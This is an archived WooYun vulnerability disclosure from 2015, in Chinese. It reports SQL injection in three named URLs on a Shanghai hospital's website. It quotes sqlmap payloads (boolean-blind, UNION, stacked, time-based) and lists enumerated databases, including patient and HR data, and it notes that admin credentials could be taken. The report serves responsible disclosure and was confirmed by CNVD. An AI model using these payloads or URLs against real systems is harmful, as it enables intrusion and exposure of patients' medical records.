乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-27: 细节已通知厂商并且等待厂商处理中 2015-03-31: 厂商已经确认,细节仅向厂商公开 2015-04-10: 细节向核心白帽子及相关领域专家公开 2015-04-20: 细节向普通白帽子公开 2015-04-30: 细节向实习白帽子公开 2015-05-15: 细节向公众公开
RT
注入点1、
http://www.rjh.com.cn/rjhsearch/Pages/Detail.aspx?yggh=J9418
2、
http://www.rjh.com.cn/RUIJIN_Portal_ClickCount_WebSite/ClickOrder.aspx?PortalType=rjh
3、
http://www.rjh.com.cn/mzynjbapp/Expert/OfficeList.aspx?OfficeID=4160000
以第一个为例:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: yggh Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: yggh=J9418' AND 5506=5506 AND 'YGzo'='YGzo Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: yggh=J9418' UNION ALL SELECT NULL,NULL,NULL,CHAR(58) CHAR(119) CHAR(103) CHAR(114) CHAR(58) CHAR(76) CHAR(104) CHAR(89) CHAR(77) CHAR(115) CHAR(115) CHAR(104) CHAR(100) CHAR(115) CHAR(77) CHAR(58) CHAR(116) CHAR(98) CHAR(113) CHAR(58),NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: yggh=J9418'; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: yggh=J9418' WAITFOR DELAY '0:0:5'-----web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2000available databases [28]:[*] CMS2003[*] crf[*] Forums[*] HIS[*] hytz[*] IntraForums[*] LWPortalDB[*] LWportalSite[*] LWXQSL[*] LZX_hytz[*] master[*] model[*] msdb[*] Northwind[*] OGManagement[*] PharmForums[*] PortalASPDB[*] pubs[*] rj_pxb[*] RJPortalDB[*] rjyy_jyk[*] RuijinOA[*] SPS01_Config_db[*] tempdb[*] webdbdns,1434[*] 瑞金内网门户1_PROF[*] 瑞金内网门户1_SERV[*] 瑞金内网门户1_SITE
其中“RJPortalDB”数据库中“RJGH_User”表中含有大量病人信息
具体数据都不深入了。。其中“crf”数据库中可以爆出管理员账号密码,顺利登入后台
Ps:第二个注入点可以爆出99个数据库
available databases [99]:[*] ChuKeAssessment[*] db_ExamOnline[*] EndocrineQuestionnaire[*] EndocrineQuestionnaire_JS[*] ExcellentManagerApply[*] FORMDB[*] Forum[*] HF_HRDB[*] HIS_JBDM_DB[*] HR_ExcellentYouthAssessment[*] HR_PerformanceAssessment[*] HR_WageQuery[*] HRDB[*] HRDB_LOG[*] IntertidCMS[*] IntertidPermissions[*] IntertidWebApp[*] master[*] model[*] msdb[*] OA_AbroadRequest[*] OA_AdvanceRequest[*] OA_APPDB[*] OA_ArchiveList[*] OA_AudioVisual[*] OA_Budget[*] OA_ClinicalReimbursement[*] OA_ClinicScheduling[*] OA_CommunistPartyMemberManage[*] OA_ConsultRequest[*] OA_CPDCirculation[*] OA_DoctorSelectCourse[*] OA_DoctorsScheduling[*] OA_DonateApprove[*] OA_EndocrineDataMaintain[*] OA_EndocrineResearchManagement[*] OA_EnrytSystem[*] OA_EthicExam[*] OA_GuardSafetyManagement[*] OA_HospitalScheduling[*] OA_HREvaluation[*] OA_HRNEEvaluation[*] OA_Infection[*] OA_MiniApplication[*] OA_NursePapers[*] OA_NurseScheduling[*] OA_NurseSelectCourse[*] OA_NursingIncidentReport[*] OA_OnlineTraining[*] OA_OutApprove[*] OA_OutWorkingRequest[*] OA_PersonModule[*] OA_Platform[*] OA_PSApplication[*] OA_Reimbursement[*] OA_Resignation[*] OA_Satisfaction[*] OA_StudentSelectCourse[*] OA_Survey[*] OA_SurveyLead[*] OA_Task[*] OA_Task135[*] OA_TeachingAssessment[*] OA_Unions[*] OA_Vote[*] Portal_Application[*] PS_Conference[*] PS_Contact[*] PS_EmsSms[*] PS_ExchangeApp[*] PS_Framework[*] PS_LogService[*] PS_Monitor[*] PS_Portal[*] PS_SchedulingService[*] PS_SecurityService[*] PS_Task[*] PS_Workflow[*] Questionnaire[*] ReportServer[*] ReportServerNew[*] ReportServerNewTempDB[*] ReportServerTempDB[*] ReservationPlatform[*] RJCRMAPPDB[*] RJDJDNT[*] RJOA[*] RJWZ[*] RJWZCY[*] RSSDB[*] ruijinCMS2010[*] RuijinHRApplication[*] RuijinResume_WUXI_FYJ[*] RuijinResume_WUXI_YJ[*] ServicePlatform[*] tempdb[*] Test[*] TNBDCWJ[*] VolunteerServiceCenter
其中数据肯定很多。。。就不深入了
你懂的
危害等级:高
漏洞Rank:12
确认时间:2015-03-31 11:22
CNVD确认并复现所述情况,已经转由CNCERT下发给上海分中心,由其后续协调网站管理单位处置。
暂无